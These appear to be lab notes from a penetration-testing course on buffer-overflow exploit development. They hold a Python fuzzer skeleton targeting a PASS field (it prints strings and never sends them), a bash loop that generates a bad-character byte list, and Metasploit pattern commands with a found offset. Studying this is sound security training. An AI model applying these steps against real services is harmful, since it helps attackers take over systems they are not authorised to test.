#fuzz hex fuzzing
#!/usr/bin/env python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer=["A"]
counter=2000

while len(buffer) <= 25:
    buffer.append("A"*counter)
    counter=counter+50

for string in buffer:
    print "Connecting to SOME Server"
    print "Fuzzing PASS with %s bytes..." % len(string)
    print string


root@PWK-KALI:~/PWK# for i in {0..9} {a..f}; do for x in {0..9} {a..f}; do printf "\\\\x$x$i"; done; done
\x00\x10\x20\x30\x40\x50\x60\x70\x80\x90\xa0\xb0\xc0\xd0\xe0\xf0\x01\x11\x21\x31\x41\x51\x61\x71\x81\x91\xa1\xb1\xc1\xd1\xe1\xf1\x02\x12\x22\x32\x42\x52\x62\x72\x82\x92\xa2\xb2\xc2\xd2\xe2\xf2\x03\x13\x23\x33\x43\x53\x63\x73\x83\x93\xa3\xb3\xc3\xd3\xe3\xf3\x04\x14\x24\x34\x44\x54\x64\x74\x84\x94\xa4\xb4\xc4\xd4\xe4\xf4\x05\x15\x25\x35\x45\x55\x65\x75\x85\x95\xa5\xb5\xc5\xd5\xe5\xf5\x06\x16\x26\x36\x46\x56\x66\x76\x86\x96\xa6\xb6\xc6\xd6\xe6\xf6\x07\x17\x27\x37\x47\x57\x67\x77\x87\x97\xa7\xb7\xc7\xd7\xe7\xf7\x08\x18\x28\x38\x48\x58\x68\x78\x88\x98\xa8\xb8\xc8\xd8\xe8\xf8\x09\x19\x29\x39\x49\x59\x69\x79\x89\x99\xa9\xb9\xc9\xd9\xe9\xf9\x0a\x1a\x2a\x3a\x4a\x5a\x6a\x7a\x8a\x9a\xaa\xba\xca\xda\xea\xfa\x0b\x1b\x2b\x3b\x4b\x5b\x6b\x7b\x8b\x9b\xab\xbb\xcb\xdb\xeb\xfb\x0c\x1c\x2c\x3c\x4c\x5c\x6c\x7c\x8c\x9c\xac\xbc\xcc\xdc\xec\xfc\x0d\x1d\x2d\x3d\x4d\x5d\x6d\x7d\x8d\x9d\xad\xbd\xcd\xdd\xed\xfd\x0e\x1e\x2e\x3e\x4e\x5e\x6e\x7e\x8e\x9e\xae\xbe\xce\xde\xee\xfe\x0f\x1f\x2f\x3f\x4f\x5f\x6f\x7f\x8f\x9f\xaf\xbf\xcf\xdf\xef\xff


/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
[*] Exact match at offset 2606

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
